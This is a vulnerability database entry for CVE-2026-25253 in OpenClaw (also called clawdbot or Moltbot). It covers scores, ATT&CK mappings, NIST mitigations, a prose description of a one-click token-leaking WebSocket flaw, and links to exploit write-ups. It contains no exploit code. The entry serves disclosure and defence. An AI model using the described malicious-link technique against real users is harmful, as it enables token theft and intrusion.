CVE-2026-25253

HighPublic PoC

Published: 01 February 2026

Published

01 February 2026

Modified

13 February 2026

KEV Added

—

Patch

—

CVSS Score 8.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

EPSS Score 0.0009 26.0th percentile

Risk Priority 18 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2026-25253 is a high-severity Incorrect Resource Transfer Between Spheres (CWE-669) vulnerability in Openclaw Openclaw. Its CVSS base score is 8.8 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploitation for Client Execution (T1203); ranked at the 26.0th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 AC-4 (Information Flow Enforcement) and SI-10 (Information Input Validation).

Threat & Defense at a Glance

What attackers do: exploitation maps to Exploitation for Client Execution (T1203) and 2 other techniques. What defenders deploy: see the NIST 800-53 controls recommended below.

Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)AI

SI-2 Flaw Remediation good match

prevent

Directly mitigates CVE-2026-25253 by requiring timely remediation through patching to version 2026.1.29 or later, preventing automatic WebSocket connections to malicious endpoints.

SI-10 Information Input Validation good match

prevent

Requires validation of untrusted query string inputs like gatewayUrl to block connections to attacker-controlled WebSocket endpoints without user prompting.

AC-4 Information Flow Enforcement good match

prevent

Enforces flow control policies to prevent the transmission of tokens over unauthorized WebSocket connections initiated from malicious query parameters.

MITRE ATT&CK Enterprise TechniquesAI

T1203 Exploitation for Client Execution Execution

Adversaries may exploit software vulnerabilities in client applications to execute code.

attack.mitre.org →

T1204.001 Malicious Link Execution

An adversary may rely upon a user clicking a malicious link in order to gain execution.

attack.mitre.org →

T1528 Steal Application Access Token Credential Access

Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.

attack.mitre.org →

Why these techniques?

Vulnerability directly enables one-click client exploitation via malicious link (T1204.001) that triggers automatic WebSocket connection to attacker endpoint, resulting in RCE (T1203) and theft/transmission of application access token (T1528).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

NVD Description

OpenClaw (aka clawdbot or Moltbot) before 2026.1.29 obtains a gatewayUrl value from a query string and automatically makes a WebSocket connection without prompting, sending a token value.

Deeper analysisAI

CVE-2026-25253 is a vulnerability in OpenClaw (also known as clawdbot or Moltbot) versions prior to 2026.1.29. The issue stems from the software obtaining a gatewayUrl value from a query string and automatically establishing a WebSocket connection without user prompting, which results in sending a token value over that connection. This flaw is rated with a CVSS v3.1 base score of 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) and is associated with CWE-669.

Attackers can exploit this vulnerability remotely without privileges by tricking a user into interacting with a malicious link containing a controlled gatewayUrl in the query string. Upon user interaction, such as clicking the link, the software connects to the attacker's WebSocket endpoint and transmits the token, enabling high-impact confidentiality, integrity, and availability consequences.

Mitigation guidance from advisories, including the GitHub Security Advisory GHSA-g8p2-7wf7-98mq, recommends updating to OpenClaw version 2026.1.29 or later. Further details on patches and exploitation techniques are provided in references such as depthfirst.com, ethiack.com, openclaw.ai/blog, and an X post by @0xacb.

References highlight real-world exploitation demonstrations, including one-click remote code execution to steal Moltbot data and keys, as detailed in the linked blog posts.

Details

CWE(s): CWE-669

Affected Products

openclaw

≤ 2026.1.29

CVEs Like This One

CVE-2026-35643Same product: Openclaw Openclaw

CVE-2026-28481Same product: Openclaw Openclaw

CVE-2026-41347Same product: Openclaw Openclaw

CVE-2026-41355Same product: Openclaw Openclaw

CVE-2026-35641Same product: Openclaw Openclaw

CVE-2026-32913Same product: Openclaw Openclaw

CVE-2026-41295Same product: Openclaw Openclaw

CVE-2026-28464Same product: Openclaw Openclaw

CVE-2026-41336Same product: Openclaw Openclaw

CVE-2026-32982Same product: Openclaw Openclaw

References

https://depthfirst.com/post/1-click-rce-to-steal-your-moltbot-data-and-keys
Exploit, Third Party Advisory · cve@mitre.org
https://ethiack.com/news/blog/one-click-rce-moltbot
Exploit, Third Party Advisory · cve@mitre.org
https://github.com/openclaw/openclaw/security/advisories/GHSA-g8p2-7wf7-98mq
Vendor Advisory · cve@mitre.org
https://openclaw.ai/blog
Product · cve@mitre.org
https://x.com/0xacb/status/2016913750557651228
Exploit · cve@mitre.org
https://depthfirst.com/post/1-click-rce-to-steal-your-moltbot-data-and-keys
Exploit, Third Party Advisory · 134c704f-9b21-4f2e-91b3-4a467353bcc0